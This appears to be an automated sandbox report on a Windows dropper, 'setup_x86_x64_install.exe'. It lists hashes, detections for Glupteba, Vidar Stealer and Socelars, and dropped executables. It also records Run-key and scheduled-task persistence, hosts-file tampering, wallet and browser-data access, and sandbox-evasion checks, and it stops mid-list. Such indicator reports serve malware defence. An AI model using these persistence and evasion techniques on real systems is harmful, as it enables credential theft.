Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
225s -
max time network
585s -
platform
windows11_x64 -
resource
win11 -
submitted
10-09-2021 20:48
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.4MB
-
MD5
65eed0fdbee8b81c1b9118f86700c6fd
-
SHA1
fcca1e88a99e2f20403e963b798e3f68f58d638d
-
SHA256
3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d
-
SHA512
f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral5/memory/5288-386-0x00000000047C0000-0x00000000050DE000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5680 4924 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2088 4924 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8012 4924 rUNdlL32.eXe -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri19d30056588.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri19d30056588.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
Processes:
WerFault.exeWerFault.exe2042317.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeidentity_helper.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5280 created 3260 5280 WerFault.exe Fri19b9b73e83c948b1d.exe PID 5296 created 4840 5296 WerFault.exe Fri19870e2febf5544.exe PID 5312 created 4792 5312 2042317.exe Fri192902b3c24.exe PID 5744 created 1404 5744 WerFault.exe Fri19927b4fe38a9d1.exe PID 5772 created 5916 5772 WerFault.exe 7.exe PID 5152 created 5796 5152 WerFault.exe 6.exe PID 5284 created 3924 5284 WerFault.exe Fri19d30056588.exe PID 5352 created 6060 5352 WerFault.exe rundll32.exe PID 3140 created 5288 3140 WerFault.exe LzmwAqmV.exe PID 5340 created 5212 5340 WerFault.exe LzmwAqmV.exe PID 720 created 5132 720 WerFault.exe LzmwAqmV.exe PID 4184 created 5252 4184 WerFault.exe LzmwAqmV.exe PID 5652 created 5196 5652 WerFault.exe LzmwAqmV.exe PID 3716 created 5804 3716 WerFault.exe 5643419.exe PID 4060 created 1684 4060 identity_helper.exe 5390489.exe PID 3736 created 5796 3736 WerFault.exe foradvertising.exe PID 928 created 7800 928 WerFault.exe GcleanerEU.exe PID 5756 created 4864 5756 WerFault.exe gcleaner.exe PID 4840 created 2140 4840 WerFault.exe rundll32.exe PID 5992 created 812 5992 WerFault.exe rundll32.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral5/memory/4792-262-0x0000000003F50000-0x0000000004021000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 43 IoCs
Processes:
MsiExec.exeflow pid process 138 6676 MsiExec.exe 141 6676 MsiExec.exe 142 6676 MsiExec.exe 143 6676 MsiExec.exe 144 6676 MsiExec.exe 145 6676 MsiExec.exe 146 6676 MsiExec.exe 148 6676 MsiExec.exe 149 6676 MsiExec.exe 150 6676 MsiExec.exe 152 6676 MsiExec.exe 154 6676 MsiExec.exe 155 6676 MsiExec.exe 156 6676 MsiExec.exe 157 6676 MsiExec.exe 158 6676 MsiExec.exe 159 6676 MsiExec.exe 160 6676 MsiExec.exe 161 6676 MsiExec.exe 162 6676 MsiExec.exe 163 6676 MsiExec.exe 164 6676 MsiExec.exe 165 6676 MsiExec.exe 166 6676 MsiExec.exe 168 6676 MsiExec.exe 169 6676 MsiExec.exe 170 6676 MsiExec.exe 171 6676 MsiExec.exe 172 6676 MsiExec.exe 174 6676 MsiExec.exe 175 6676 MsiExec.exe 176 6676 MsiExec.exe 177 6676 MsiExec.exe 178 6676 MsiExec.exe 179 6676 MsiExec.exe 180 6676 MsiExec.exe 181 6676 MsiExec.exe 184 6676 MsiExec.exe 185 6676 MsiExec.exe 186 6676 MsiExec.exe 187 6676 MsiExec.exe 188 6676 MsiExec.exe 189 6676 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
46807GHF____.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeFri195cd4dbfdf37897.exeFri191454c4b4.exeFri19d30056588.exeFri192c305b4a.exeFri192902b3c24.exeFri192b9eeaa03b.exeFri19870e2febf5544.exeFri1921f7a9d3.exeFri19b9b73e83c948b1d.exeFri192f077acf656dd.exeFri19927b4fe38a9d1.exeFri19ca03f05489b.exeFri195cd4dbfdf37897.tmpFri192b9eeaa03b.tmpChrome 5.exe1.exe46807GHF____.exe2.exeWerFault.exe4.exe5.exe6.exe7.exeBearVpn 3.exetmpD5D9_tmp.exeLzmwAqmV.exeLzmwAqmV.exe5390489.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exe2042317.exeSetup.exe5643419.exeSetup.exestats.exeWinHoster.exestats.tmpAdorarti.exe.comAdorarti.exe.comSetup.exeservices64.exeWerFault.exeImpedire.exe.comImpedire.exe.comultramediaburner.exeultramediaburner.tmpSyzhaloluxy.exeUltraMediaBurner.exeBexaepunuly.exeforadvertising.exesihost64.exeServices.exewrap 1.exeGcleanerEU.exeinstaller.exeanyname.exegcleaner.exesihost64.exegdgame.exegdgame.exeinstaller.exepid process 4812 setup_installer.exe 4124 setup_install.exe 4852 Fri195cd4dbfdf37897.exe 4868 Fri191454c4b4.exe 3924 Fri19d30056588.exe 1020 Fri192c305b4a.exe 4792 Fri192902b3c24.exe 3604 Fri192b9eeaa03b.exe 4840 Fri19870e2febf5544.exe 736 Fri1921f7a9d3.exe 3260 Fri19b9b73e83c948b1d.exe 4804 Fri192f077acf656dd.exe 1404 Fri19927b4fe38a9d1.exe 660 Fri19ca03f05489b.exe 1556 Fri195cd4dbfdf37897.tmp 4992 Fri192b9eeaa03b.tmp 1368 Chrome 5.exe 804 1.exe 4940 46807GHF____.exe 5124 2.exe 5340 WerFault.exe 5464 4.exe 5640 5.exe 5796 6.exe 5916 7.exe 6088 BearVpn 3.exe 5168 tmpD5D9_tmp.exe 5212 LzmwAqmV.exe 5288 LzmwAqmV.exe 1684 5390489.exe 5132 LzmwAqmV.exe 5196 LzmwAqmV.exe 5252 LzmwAqmV.exe 5312 2042317.exe 5568 Setup.exe 5804 5643419.exe 6108 Setup.exe 5880 stats.exe 5356 WinHoster.exe 5480 stats.tmp 1360 Adorarti.exe.com 5296 Adorarti.exe.com 5452 Setup.exe 5744 services64.exe 5756 WerFault.exe 1556 Impedire.exe.com 5492 Impedire.exe.com 5380 ultramediaburner.exe 6060 ultramediaburner.tmp 5668 Syzhaloluxy.exe 836 UltraMediaBurner.exe 3152 Bexaepunuly.exe 5796 foradvertising.exe 5656 sihost64.exe 3996 Services.exe 7636 wrap 1.exe 7800 GcleanerEU.exe 7832 installer.exe 8028 anyname.exe 4864 gcleaner.exe 960 sihost64.exe 7504 gdgame.exe 7612 gdgame.exe 7808 installer.exe -
Loads dropped DLL 38 IoCs
Processes:
setup_install.exeFri195cd4dbfdf37897.tmpFri192b9eeaa03b.tmprundll32.exestats.tmpWerFault.exeinstaller.exeMsiExec.exerundll32.exeMsiExec.exerundll32.exeMsiExec.exepid process 4124 setup_install.exe 4124 setup_install.exe 4124 setup_install.exe 4124 setup_install.exe 4124 setup_install.exe 4124 setup_install.exe 4124 setup_install.exe 4124 setup_install.exe 1556 Fri195cd4dbfdf37897.tmp 1556 Fri195cd4dbfdf37897.tmp 4992 Fri192b9eeaa03b.tmp 6060 rundll32.exe 5480 stats.tmp 5480 stats.tmp 5756 WerFault.exe 7832 installer.exe 7832 installer.exe 7832 installer.exe 5188 MsiExec.exe 5188 MsiExec.exe 2140 rundll32.exe 6676 MsiExec.exe 6676 MsiExec.exe 6676 MsiExec.exe 6676 MsiExec.exe 6676 MsiExec.exe 6676 MsiExec.exe 6676 MsiExec.exe 6676 MsiExec.exe 6676 MsiExec.exe 6676 MsiExec.exe 7832 6676 MsiExec.exe 6676 MsiExec.exe 812 rundll32.exe 7820 MsiExec.exe 7820 MsiExec.exe 6676 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
tmpD5D9_tmp.exe2042317.exe46807GHF____.exemsedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce tmpD5D9_tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" tmpD5D9_tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2042317.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Muxecopigae.exe\"" 46807GHF____.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg6_6asg.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg6_6asg.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\A: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ipinfo.io 52 ipinfo.io 1 ip-api.com 12 ipinfo.io -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Services.exeservices64.exedescription pid process target process PID 3996 set thread context of 6200 3996 Services.exe conhost.exe PID 5744 set thread context of 6404 5744 services64.exe explorer.exe -
Drops file in Program Files directory 18 IoCs
Processes:
ultramediaburner.tmpjg6_6asg.exeSetup.exe46807GHF____.exedescription ioc process File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-CLP6M.tmp ultramediaburner.tmp File created C:\Program Files (x86)\SmartPDF\SmartPDF\d jg6_6asg.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d jg6_6asg.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\tmp.edb jg6_6asg.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d.jfm jg6_6asg.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe Setup.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\d.INTEG.RAW jg6_6asg.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url Setup.exe File created C:\Program Files (x86)\UltraMediaBurner\is-U80UE.tmp ultramediaburner.tmp File created C:\Program Files (x86)\MSBuild\Muxecopigae.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe Setup.exe File created C:\Program Files\Windows Defender\MONPZZPOWK\ultramediaburner.exe.config 46807GHF____.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\MSBuild\Muxecopigae.exe.config 46807GHF____.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\d.jfm jg6_6asg.exe File created C:\Program Files\Windows Defender\MONPZZPOWK\ultramediaburner.exe 46807GHF____.exe -
Drops file in Windows directory 28 IoCs
Processes:
msiexec.exeMsiExec.exeWerFault.exedescription ioc process File created C:\Windows\Installer\f750c55.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI209B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI231D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI65A0.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF3F6295CF8C00F916.TMP msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File created C:\Windows\SystemTemp\~DFB5FD17F2507E8ACC.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\f750c55.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3E4C.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI5C86.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF695BC971B434F4AD.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI1CA2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1E97.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI33AA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3A44.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF4A25DA8D0C70F27D.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI43AD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI367A.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI62E0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1463.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI24A5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2726.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI417A.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5516 4792 WerFault.exe Fri192902b3c24.exe 5612 4840 WerFault.exe Fri19870e2febf5544.exe 5488 3260 WerFault.exe Fri19b9b73e83c948b1d.exe 5884 1404 WerFault.exe Fri19927b4fe38a9d1.exe 1692 5796 WerFault.exe 6.exe 5404 3924 WerFault.exe Fri19d30056588.exe 5248 6060 WerFault.exe rundll32.exe 3692 5288 WerFault.exe LzmwAqmV.exe 4620 5804 WerFault.exe 5643419.exe 4208 1684 WerFault.exe 5390489.exe 5524 5796 WerFault.exe foradvertising.exe 4768 7800 WerFault.exe GcleanerEU.exe 5612 4864 WerFault.exe gcleaner.exe 6156 2140 WerFault.exe rundll32.exe 3560 812 WerFault.exe rundll32.exe 6544 8032 WerFault.exe vdi_compiler.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsiexec.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision msiexec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5620 schtasks.exe 4364 schtasks.exe 4816 schtasks.exe 1344 schtasks.exe -
Enumerates system info in registry 2 TTPs 33 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exemsiexec.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msiexec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened 